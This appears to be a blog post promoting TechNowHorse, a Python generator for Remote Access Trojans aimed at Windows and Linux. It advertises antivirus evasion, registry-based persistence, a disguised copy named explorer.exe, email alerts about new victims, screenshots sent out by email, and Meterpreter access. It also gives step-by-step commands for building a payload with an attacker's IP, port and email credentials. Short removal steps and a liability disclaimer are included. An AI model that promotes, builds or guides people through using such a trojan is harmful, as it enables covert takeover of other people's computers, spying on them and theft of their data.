TechNowHorse is a RAT (Remote Administrator Trojan) Generator for Windows/Linux systems written in Python 3.

TechNowHorse Featured Image

This tool is coded by me and it is totally free to use, modify & distribute.

The Payload generated by it bypasses almost all major anti-viruses, and will improve with the passage of time.

Disclaimer

computer

This project was created only for good purposes and personal use.

THIS SOFTWARE IS PROVIDED “AS IS” WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.

This tool is created by me (Pushpender Singh) the owner of this website, all contributor’s are welcome, they can request for pull in GitHub, if their work is worthy for this project then there work will merged by me.

This small tool can do really awesome work.

Let us explore the functionality of this tool,

Features

  • Works on Windows/Linux
  • Notify New Victim Via Email
  • Undetectable
  • Persistence
  • Sends Screenshot of Victim PC’s Screen via email
  • Give Full Meterpreter Access to Attacker
  • Didn’t ever require metesploit installed to create trojan
  • Creates Executable Binary With Zero Dependencies
  • Generates payload of less size, approx 5mb in size

Tested on

Tested on Image technowhorse

Following is the limitations of meterpreter payload generated using metasploit:-

  • Have to run the Metasploit Listener before executing backdoor
  • Backdoor itself don’t become persistence, we have to use the post exploitation modules in order to make backdoor persistence. And post exploitation modules can only be used after successful exploitation.
  • Didn’t Notify us whenever payload get executed on new system.

We all know how powerful the Meterpeter payload is but still the payload made from it is not satisfactory.

Following are the features of this payload generator which will give you a good idea of this python script:-

  • Uses Windows registry to become persistence in windows.
  • Also manages to become persistence in Linux system.
  • Payload can run on LINUX as well as WINDOWS.
  • Provide Full Access, as metasploit listener could be used as well as supports custom listener (You can Create Your Own Listener)
  • Sends Email Notification, when ever payload runs on new system, with complete system info.
  • Generates payload within 1 minute of ever less.
  • Supports all meterpreter post exploitation modules.
  • Payload Can be Created on Windows as well as Linux system.

Prerequisite

  • Python 3.X
  • Few External Modules

This tool is purely written in python programming language, so that is why it will run on any system.

Note:- Currently Macintosh system are not supported, as it will automatically become persistence, and for that it first detects the system.

How to Use in Kali Linux OS

Note:- Procedure for Any Linux OS is literally same.


# Install dependencies 
$ Install latest python 3.x

# Clone this repository
[email protected]:~#  git clone https://github.com/Technowlogy-Pushpender/technowhorse.git

# Go into the repository
[email protected]:~#  cd technowhorse

# Installing dependencies
[email protected]:~#  python -m pip install -r requirements.txt

[email protected]:~#  chmod +x paygen.py
[email protected]:~#  ./paygen.py  --help    or   python paygen.py --help

# Making Payload/RAT
[email protected]:~#  python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name

How to Use in Windows OS

Any windows OS with python 3.X installed can be used to generate payload for Linux as well as windows.

As in windows, to execute an executable you don’t have to give executable permissions, so you can run directly form the command prompt or power shell.

First, download the zip of this git repository.

Extract it,

And follow the following code display screen;


# Install dependencies 
$ Install latest python 3.x

# Clone/Download this repository
$ git clone https://github.com/Technowlogy-Pushpender/technowhorse.git

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

# Go into the repository
C:\Users\Pushpender singh> cd technowhorse

# Installing dependencies
C:\Users\Pushpender singh> python -m pip install -r requirements.txt

# Open paygen.py in Text editor and Configure Line 7 "PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe" "

# Getting Help Menu
C:\Users\Pushpender singh> python paygen.py --help

C:\Users\Pushpender singh> python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -w -o output_file_name

Note:- Evil File will be saved inside dist/ folder, inside technowhorse/ folder

Screenshots:

Getting Help

Running paygen.py Script

When RAT runs, it adds Registry to become persistence

Makes copy of itself and saved it inside Roaming

Report been sended by RAT

Getting Notification From Victim PC

Contributors:

Currently this repo is maintained by me (Pushpender Singh). Owner of https://www.technowlogy.tk Website.

All contributor’s pull request will be accepted if their pull request is worthy for this repo.

TODO

  • Add new features
  • Contribute GUI

Removing Trojan Horse

  • Go to start, type regedit and run the first program, this will open the registry editor.
  • Navigate to the following path Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run There should be an entry called winexplorer, right click this entry and select Delete.
  • Go to your user path > AppData > Roaming, you’ll see a file named “explorer.exe”, this is the RAT, right click > Delete.
  • Restart the System.

This tool didn’t create any temp file and thus didn’t left any traces. Whenever new victim executes the payload, attacker get notified via email with complete info of target system.(That is why valid email and password is required)

All the screenshot been captured by this RAT is automatically deleted by RAT once they delivered to attacker via email.

Tool didn’t ever required metasploit to be installed on system to generate their own RAT (Remote Access Trojan)

So, guys that is all about this blog, hope you enjoyed this blog,

If you have any doubt/issue the please mention the issue in this GitHub repository

This is the official GitHub Repository.

More features are coming soon…

If you have any new idea or want to add new features to it or want to contribute GUI version of this tool, then you are most welcome.

3 COMMENTS

LEAVE A REPLY

Please enter your comment!
Please enter your name here